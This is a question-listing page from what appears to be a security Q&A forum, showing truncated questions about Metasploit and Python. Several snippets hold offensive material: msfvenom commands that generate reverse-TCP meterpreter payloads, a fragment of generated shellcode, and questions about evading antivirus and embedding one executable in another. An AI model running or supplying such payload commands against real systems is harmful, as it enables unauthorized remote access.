Skip to main content

All Questions

Tagged with
1vote
1answer
94views

How can I prevent msfvenom Python payloads from forking without manually decoding the payload?

I am generating a Python payload using msfvenom with the following command: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
Onyz's user avatar
0votes
1answer
210views

How to embed a PE file to another PE files

So what I want to do basically is what BDFproxy does on the go, I want to modify a file (on the disk) to embed another PE in it and have both working, it does not matter if they work concurrently or ...
LuckyCoder3607's user avatar
2votes
1answer
830views

Metasploit Python module: "Unknown datastore option: CMD."

In a Python Metasploit module that I'm developing, I am trying to use CMD as one of the options: 'options': { 'RHOST': {'type': 'address', 'description': 'Target address', 'required': True, '...
Aaron Meese's user avatar
0votes
0answers
25views

Can I import this exploit on metasploit or is better to use it in python? [duplicate]

I have tried to import this exploit: https://www.exploit-db.com/exploits/50539 and then use it in Metasploit (I'm following a walkthrough), but Metasploit cannot load it. Also I tried to use Python ...
Jorge Corante's user avatar
0votes
2answers
3kviews

Making My Own Custom Payload [closed]

I have tried many different tools to avoid being detected by an AV while using meterpreter exploit. Here is a list of tools I have tried: Shellter, Posh C2, Hack the World, Veil, Fat Rat, and many ...
Mani's user avatar
0votes
1answer
712views

When using metasploit with my python reverse shell script I get a byte error, but it seems to work fine when using a netcat listener

When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions. When attempting to replicate this in metasploit I use set payload windows/...
Volapiik Vyrient's user avatar
0votes
1answer
2kviews

Executing shellcode in python format [closed]

So after running the command: msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py I receive the output: buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\...
Alexander Dimitrov's user avatar
2votes
1answer
894views

Can't log in dvwa with a simple python program, even though login credentials are good

import requests target_url = "http://127.0.0.1/dvwa/login.php" data_dict = {"csrfmiddlewaretoken": "bbbfeed6e1aea50f14a51a331054022c", "username": "admin", "password": "password", "Login": "Submit"} ...
Erik Dz's user avatar
4votes
1answer
9kviews

Metasploit is not detecting newly imported python exploit

I have added OpenSSH 7.2p2 - Username Enumeration exploit to Metasploit, which is a python exploit. But after so, it does not detect that exploit every way I tried. I have placed it under the ...
Ratnadeep Chakraborty's user avatar
1vote
1answer
126views

Cannot reproduce MSF fuzzer results?

This is my first time asking for some support in my case. Please forgive me, as I am still learning... The scenario is really simple: Some device with HTTP server is being fuzzed by metasploit's ...
Morti S's user avatar
1vote
0answers
2kviews

Converting Metasploit module to standalone Python script [closed]

How easy is to convert Ruby code to Python code and to change Metasploit module into standalone Python script for Linux?
minto's user avatar
1vote
1answer
3kviews

veil framework, reverse https and tcp payload differences

I am using veil framework to bypass av, when i want to choose a payload there are many choices, there is: rev_https_contained python/meterpreter/rev_https c/meterpreter/rev_tcp My question is what is ...
Hojat Taheri's user avatar

close